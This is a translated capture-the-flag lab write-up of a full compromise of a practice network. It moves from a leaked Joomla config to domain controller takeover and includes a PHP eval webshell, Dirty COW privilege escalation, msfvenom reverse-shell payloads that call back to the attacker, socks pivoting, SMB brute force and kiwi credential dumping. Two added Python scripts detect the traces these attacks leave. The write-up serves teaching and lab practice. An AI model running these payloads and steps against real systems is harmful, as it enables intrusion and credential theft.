红日安全 (Hongri Security) Internal Network Lab (3): Penetration Write-up
Environment setup is skipped here.
Information gathered so far:
- One web server with a public IP (in my setup it is on the 16.16.16.0 segment, 16.16.16.160)
- Ports 22, 80 and 3306 open
- Joomla 3.9.12
- MySQL 5.7.27
- Sensitive directories and files
  - 1.php: phpinfo page (note: disable_functions blocks many functions, which affects command execution through the webshell later)
  - /administrator/: backend login
  - configuration.php~: backup copy of the configuration file
    - database connection account and password (testuser/cvcvgjASD!@)
    - database table prefix (am2zu_)
Getting the backend
Since 3306 is open, we try connecting to the database directly from the attack machine.
cmd :mysql -u testuser -h 16.16.16.160 -p
// after pressing Enter, type the password and you are in the database
MySQL [joomla]>
MySQL [joomla]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.011 sec)
MySQL [joomla]> use joomla;
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.011 sec)
// Combining this with the table prefix found earlier in the configuration file, we look at the "am2zu_users" table, guessing it is the one that stores the backend accounts
MySQL [joomla]> select * from am2zu_users;
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
2 rows in set (0.011 sec)
Looking up how Joomla hashes passwords showed that the "$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2" value was produced by password_hash($password, PASSWORD_BCRYPT); and I found no way to recover the password from it.
Brute forcing the login through Burp also led nowhere. I was stuck here for a long time.
Later, reading the official Joomla documentation, I found that an administrator account can be added by inserting directly into the database. What luck: we happen to have database access.
//https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
//In the SQL below, jos31 must be replaced with your actual table prefix
INSERT INTO `jos31_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
//After running these two statements, an administrator user has been added (account: admin2, password: secret)
Logged in successfully via http://16.16.16.160/administrator/.
Getting a webshell
Searching for Joomla backend getshell techniques shows that under Extensions -> Templates you can get a shell by editing the template's PHP files.
Concretely, open the template editor, modify index.php or add a new PHP file, and put a one-liner in it: <?php @eval($_POST['hack'])?>
Connect directly with AntSword (蚁剑).
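The admin account inserted above leaves a distinctive trace in the users table: a Super User whose password is in the legacy md5:salt format (which Joomla 3.2+ never writes itself) and whose date columns were all set by NOW(). The following audit query is an added example, not part of the original write-up; it models the two Joomla tables involved in an in-memory SQLite database with constructed rows (the admin2 hash is the one from the Joomla documentation snippet, group id 8 is Joomla's built-in Super Users group) so it runs offline, and the same SELECT can be run against the real MySQL database.

```python
"""Audit a Joomla users table for Super User accounts that look hand-inserted.

Added example, not from the original write-up. The tables below mimic
<prefix>_users and <prefix>_user_usergroup_map in SQLite with constructed rows.
"""
import re
import sqlite3

SUPER_USER_GROUP = 8          # Joomla's built-in "Super Users" group id
# Legacy Joomla (< 3.2) format: md5(password + salt) ":" salt; 3.2+ writes bcrypt
LEGACY_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{32}$")
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$.{53}$")

def build_sample_db(prefix="am2zu_"):
    """Constructed data: the original admin plus the admin2 account inserted in the lab."""
    con = sqlite3.connect(":memory:")
    # prefix comes from configuration.php (operator-controlled), never from user input
    con.executescript(f"""
        CREATE TABLE {prefix}users(id INTEGER PRIMARY KEY, username TEXT,
            password TEXT, registerDate TEXT, lastvisitDate TEXT);
        CREATE TABLE {prefix}user_usergroup_map(user_id INTEGER, group_id INTEGER);
        INSERT INTO {prefix}users VALUES
          (891,'administrator','$2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2',
               '2019-10-19 12:48:41','0000-00-00 00:00:00'),
          (892,'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199',
               '2022-03-02 14:40:00','2022-03-02 14:40:00');
        INSERT INTO {prefix}user_usergroup_map VALUES (891,8),(892,8);
    """)
    return con

def audit_super_users(con, prefix="am2zu_"):
    """Return (username, reasons) for every Super User with suspicious traits."""
    rows = con.execute(f"""
        SELECT u.id, u.username, u.password, u.registerDate, u.lastvisitDate
        FROM {prefix}users u JOIN {prefix}user_usergroup_map m ON m.user_id = u.id
        WHERE m.group_id = ?""", (SUPER_USER_GROUP,)).fetchall()
    findings = []
    for _uid, name, pw, reg, last in rows:
        reasons = []
        if LEGACY_RE.match(pw):
            reasons.append("legacy md5:salt hash (never written by Joomla 3.2+; direct DB insert?)")
        elif not BCRYPT_RE.match(pw):
            reasons.append("unrecognised hash format")
        if reg == last and reg != "0000-00-00 00:00:00":
            reasons.append("registerDate == lastvisitDate (all date columns set to NOW())")
        if reasons:
            findings.append((name, reasons))
    return findings

if __name__ == "__main__":
    for name, why in audit_super_users(build_sample_db()):
        print(name, "->", "; ".join(why))
```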
[Screenshot 2022-03-02 14:46, image not included]
In the virtual terminal, commands fail to execute; it seems the functions are disabled.
In practice, AntSword's "PHP7 GC with Certain Destructors UAF" plugin bypasses the restriction directly.
But it is a low-privilege account:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation
Check the Linux version information
(www-data:/var/www/html/templates) $ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
(www-data:/var/www/html/templates) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
After trying several local privilege escalation exploits for kernel 4.4.0 without success, I was stuck for a long time and decided to step back and rethink.
...
A turn of fortune: browsing directories with AntSword, I found a test.txt file under /tmp/mysql; opening it revealed a backup of an account and password:
adduser wwwuser
passwd wwwuser_123Aqx
SSH in directly
ssh wwwuser@16.16.16.160
After connecting it turns out to be an ordinary user; run uname -a again
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Kernel 2.6.32; search for a matching exploit
searchsploit linux 2.6 cow
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID M | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Meth | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd M | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
------------------------------------------------------------------------------------------------------------- ---------------------------------
After several attempts, linux/local/40839.c succeeded in escalating privileges. The steps:
1. Download the corresponding file
searchsploit -m linux/local/40839.c
2. Start a web server with Python on the attack machine
python3 -m http.server
3. Download it on the Linux machine
wget http://16.16.16.160/40839.c
4. Compile
gcc -pthread -o 40839 40839.c -lcrypt
5. Run
./40839
6. On success it asks you to enter a password
7. A root-privileged user is created (firefart/yourpassword)
8. su firefart and enter the password
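The 40839.c exploit used here writes its new uid-0 "firefart" entry over the start of /etc/passwd (it backs the original up to /tmp/passwd.bak first), so the host-side check a defender wants is simply: which accounts have uid 0, and is root still intact? The script below is an added example, not part of the original write-up; the two passwd samples are constructed, and the password hash in the "after" sample is a made-up value.

```python
"""Check /etc/passwd for the trace left by the 40839.c Dirty COW exploit.

Added example, not part of the original write-up. Sample contents are constructed.
"""
import os

def uid0_accounts(passwd_text):
    """Return the names of all accounts with uid 0, in file order."""
    names = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:        # malformed line; skip rather than crash
            continue
        if fields[2] == "0":
            names.append(fields[0])
    return names

def passwd_findings(passwd_text):
    """Human-readable findings; an empty list means nothing suspicious."""
    roots = uid0_accounts(passwd_text)
    findings = []
    for name in roots:
        if name != "root":
            findings.append(f"unexpected uid-0 account: {name}")
    if "root" not in roots:
        # the exploit overwrites the first line, which is normally root's
        findings.append("root entry missing or no longer uid 0")
    return findings

# Constructed sample: what /etc/passwd can look like after the exploit ran
# (the root line has been replaced; the hash is a made-up placeholder).
SAMPLE_AFTER = """\
firefart:fiPGPcnO4e1ak:0:0:pwned:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
"""
# Constructed sample of an untouched file.
SAMPLE_CLEAN = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
"""

if __name__ == "__main__":
    # On a live host, check the real file and the backup the exploit leaves behind.
    with open("/etc/passwd") as fh:
        live = passwd_findings(fh.read())
    if os.path.exists("/tmp/passwd.bak"):
        live.append("/tmp/passwd.bak present (backup written by 40839.c)")
    print("\n".join(live) or "no findings")
```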
#ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:32:46:C9
inet addr:16.16.16.167 Bcast:16.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46c9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5074 errors:0 dropped:0 overruns:0 frame:0
TX packets:2521 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:684640 (668.5 KiB) TX bytes:692275 (676.0 KiB)
eth1 Link encap:Ethernet HWaddr 00:0C:29:32:46:D3
inet addr:192.168.93.100 Bcast:192.168.93.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46d3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43309 errors:0 dropped:0 overruns:0 frame:0
TX packets:519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4423428 (4.2 MiB) TX bytes:66073 (64.5 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:1#
Moving to msf
msfvenom -p python/meterpreter/reverse_tcp LHOST=16.16.16.160 LPORT=4444 -f raw -o payload.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 16.16.16.160
set LPORT 4444
run
# after a session is obtained
bg
# set up routing
use post/multi/manage/autoroute
set session 1
run
# start the socks5 proxy
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
With the socks proxy running, test it on the attack machine with proxychains
# configure the socks5 proxy in proxychains
# socks5 127.0.0.1 1080
proxychains curl http://192.168.93.100 # this is an internal IP; if it connects, the socks proxy is working
# run ping on the current machine to find live internal hosts
for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
192.168.93.1
192.168.93.10
192.168.93.20
192.168.93.30
192.168.93.100 (CentOS, reverse-proxies the Ubuntu box's web and database services)
192.168.93.120 (Ubuntu, serves the web application)
From the IPs found, there are 5 machines in total.
# nmap scan of the corresponding hosts
proxychains nmap -sT -sV -Pn 192.168.93.10,20,30,100,120
192.168.93.120
------------------
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
192.168.93.10
------------------
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-03 06:55:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: TEST)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49155/tcp open unknown
49156/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Service Info: Host: WIN-8GA56TNV3MV; OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.93.20
----------------
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: TEST)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600; RTM
2383/tcp open ms-olap4?
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
192.168.93.30
-------------------
PORT STATE SERVICE VERSION
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: TEST)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
Summarizing the nmap results for 192.168.93.10, 20 and 30:
10: most likely the domain controller; runs DNS and LDAP; domain test.org
20: Windows 2008 R2 domain member, MSSQL service
30: Windows 7 domain member
First I ran ms17-010; none of the three machines is vulnerable. So much for the quick win I had hoped for. Looking back at the information collected, the machine at .20 exposes MSSQL, but we have no account for it. Then I remembered the earlier MySQL credentials and tried them there, and the login actually worked, but it is a low-privileged guest database account with no way to escalate.
Later I saw that others online had succeeded with SMB brute force, password 123qwe!ASD. I was dumbfounded: was my wordlist really that weak? Nothing to say except add the password to the dictionary. =-=
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.20/ # 123qwe!ASD
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.30/ # 123qwe!ASD
The plan now is to generate a Windows payload with msf, upload it to 192.168.93.20 and run it to get a reverse meterpreter, but there is a problem: 192.168.93.20 has no outbound internet access. Solution: use the CentOS box (192.168.93.100) as a pivot and set up port forwarding, forwarding the Kali attack machine's port 55555 to port 55555 on the pivot. We use an SSH tunnel for this: first SSH into CentOS, then run the following command:
// -C compress traffic; -f send ssh to the background so it does not occupy the current shell; -N open the connection without running a remote command; -g allow remote hosts to connect to the local forwarded port; -L local port forward; 16.16.16.182 is the Kali attack machine's IP
ssh -CfNg -L 55555:16.16.16.182:55555 root@16.16.16.182
With port forwarding in place, generate the Windows payload with msf
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.93.100 LPORT=55555 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o /root/55555.exe
//the callback goes to the pivot; the payload listener only needs to run on the Kali machine
Set up the msf listener
msf
LHOST 16.16.16.182
LPORT 55555
We can connect with smbclient on Kali and upload the generated 55555.exe
proxychains -q smbclient //192.168.93.20/c$ -U administrator
smb: \>put 55555.exe
wmiexec.py from the Impacket toolkit gives a cmd session:
proxychains -q python3 wmiexec.py administrator:123qwe\!ASD@192.168.93.20
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# run 55555.exe
C:\>55555.exe (may need to be run several times before it succeeds)
Once that is done, msf gets a meterpreter session on 192.168.93.20
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# migrate into a SYSTEM process
migrate xxxpid
# load kiwi
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST zxcASDqw123!!
Administrator WIN2008 123qwe!ASD
...
This directly yields the domain controller account and password: TEST\Administrator:zxcASDqw123!!
If the goal is just the flag, logging in with smbclient is enough
root@kali ~ proxychains -q smbclient -U administrator //192.168.93.10/c$
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\192.168.93.10\c$\
smb: \> cd Users/Administrator/Documents/
smb: \Users\Administrator\Documents\> ls
. DR 0 Thu Oct 31 00:52:43 2019
.. DR 0 Thu Oct 31 00:52:43 2019
desktop.ini AHS 402 Wed Oct 30 22:12:57 2019
flag.txt A 13 Thu Oct 31 00:53:16 2019
My Music DHSrn 0 Sun Oct 6 19:14:33 2019
My Pictures DHSrn 0 Sun Oct 6 19:14:33 2019
My Videos DHSrn 0 Sun Oct 6 19:14:33 2019
15728127 blocks of size 4096. 12293852 blocks available
smb: \Users\Administrator\Documents\>get flag.txt
smb: \Users\Administrator\Documents\>exit
root@kali ~ cat flag.txt
this is flag!#
To get a meterpreter in msf instead, repeat the same procedure used for the Win2008 machine: upload the msf-generated 55555.exe and run it, and msf will receive a meterpreter session.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 16.16.16.182:55555
[*] Sending stage (175174 bytes) to 16.16.16.182
[*] Meterpreter session 5 opened (16.16.16.182:55555 -> 16.16.16.182:45240 ) at 2022-03-09 19:18:08 +0800
meterpreter > sysinfo
Computer : WIN-8GA56TNV3MV
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : TEST
Logged On Users : 4
Meterpreter : x86/windows
meterpreter > getuid
Server username: TEST\Administrator